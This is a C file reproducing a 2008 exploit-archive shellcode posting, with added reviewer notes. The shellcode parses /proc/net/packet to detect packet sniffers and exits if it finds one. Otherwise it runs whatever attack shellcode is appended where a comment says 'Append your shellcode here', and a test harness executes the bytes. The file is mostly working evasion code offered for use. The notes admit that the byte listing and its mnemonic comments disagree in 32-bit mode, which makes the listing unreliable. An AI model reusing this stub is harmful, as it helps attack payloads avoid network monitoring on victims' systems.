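/*
 * [Decorative banner omitted: the original text was mis-encoded beyond
 *  recovery in this copy.]
 *
 * Ho' Detector (Promiscuous mode detector shellcode)
 * by XenoMuta <xenomuta[at]phreaker[dot]net>
 * http://xenomuta.tuxfamily.org/
 *
 * This shellcode uses a stupid, yet effective method for detecting
 * sniffing on all interfaces in linux: parsing /proc/net/packet, which
 * contains libpcap's stats and only one line (56 bytes) when not sniffing.
 *
 * Reviewer notes:
 *  - 32-bit x86 Linux only: the system calls go through int 0x80 with the
 *    i386 numbers used below (open = 5, read = 3, exit = 1), so the
 *    harness must be a 32-bit process (e.g. built with -m32).
 *  - Most instructions carry a 0x66 operand-size prefix.  That is what an
 *    assembler emits for 32-bit operations when assembling in 16-bit mode
 *    (NASM's default without `BITS 32`); decoded by a 32-bit process the
 *    same bytes become 16-bit operations (e.g. `\x66\x68 imm16` is
 *    `push word`, not `push dword`).  The mnemonics in the per-line
 *    comments therefore describe the 16-bit-mode reading.  Verify with a
 *    32-bit disassembler before relying on this listing; the bytes are
 *    kept exactly as published.
 *  - The check is a fixed-size heuristic: read() asks for at most 57
 *    bytes and the low byte of the returned count is compared with 56.
 *    Presumably any process holding an AF_PACKET socket -- not only a
 *    sniffer -- adds a line to /proc/net/packet, and the header length may
 *    differ between kernel versions, so treat a hit as an indicator to
 *    confirm by other means (e.g. interface flags, socket listings) rather
 *    than as proof of sniffing.
 *  - After the trailing nop, execution runs off the end of the array into
 *    the string's NUL terminator; the author expects a payload to be
 *    appended there.  main() jumps into a writable global array, which
 *    faults wherever .data is mapped non-executable (the usual default on
 *    current toolchains) unless that protection is deliberately relaxed
 *    for the test build.
 */

/* Raw shellcode bytes, kept in a plain global array exactly as published
 * (see the header notes on operand-size prefixes and executability). */
char sc[] =
    "\x66\x31\xC0"              /* xor eax,eax                               */
    "\x66\x50"                  /* push eax            ; NUL terminator      */
    "\x66\x68\x63\x6B\x65\x74"  /* push dword 0x74656b63 ; "cket"            */
    "\x66\x68\x74\x2F\x70\x61"  /* push dword 0x61702f74 ; "t/pa"            */
    "\x66\x68\x63\x2F\x6E\x65"  /* push dword 0x656e2f63 ; "c/ne"            */
    "\x66\x68\x2F\x70\x72\x6F"  /* push dword 0x6f72702f ; "/pro"            */
    "\xB0\x05"                  /* mov al,0x5          ; open()              */
    "\x66\x89\xE3"              /* mov ebx,esp         ; "/proc/net/packet"  */
    "\x66\x31\xC9"              /* xor ecx,ecx         ; O_RDONLY            */
    "\xCD\x80"                  /* int 0x80                                  */
    "\x66\x93"                  /* xchg eax,ebx        ; fd -> ebx           */
    "\x6A\x03"                  /* push byte +0x3      ; read()              */
    "\x66\x58"                  /* pop eax                                   */
    "\x66\x89\xE1"              /* mov ecx,esp         ; buffer = stack top  */
    "\x6A\x39"                  /* push byte +0x39     ; at most 57 bytes    */
    "\x66\x5A"                  /* pop edx                                   */
    "\xCD\x80"                  /* int 0x80                                  */
    "\x3C\x38"                  /* cmp al,0x38         ; if only 56 bytes    */
    "\x74\x06"                  /* jz 0x40             ; there is no packet  */
    "\x6A\x01"                  /* push byte +0x1      ; capture. Proceed    */
    "\x66\x58"                  /* pop eax             ; with shellcode      */
    "\xCD\x80"                  /* int 0x80            ; else, exit()        */
    /* Append your shellcode here */
    "\x90";                     /* nop                 ; jz 0x40 lands here  */

/*
 * Test harness: transfer control into the byte array.
 *
 * Only meaningful in a 32-bit x86 process whose data segment is
 * executable (see header notes).  When the check finds no packet socket
 * the shellcode calls exit() and this function never returns; otherwise
 * execution continues past the trailing nop.
 */
int main(void)
{
    /* Converting an object pointer to a function pointer is not portable
     * C; it is kept because the whole listing is x86/Linux specific. */
    void (*entry)(void) = (void (*)(void))sc;
    entry();
    return 0;
}

/*
 * Signature from the original posting.  It presumably covers the original
 * single-line text, so it will not verify against this reformatted file.
 *
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----
 *
 * milw0rm.com [2008-11-18]
 */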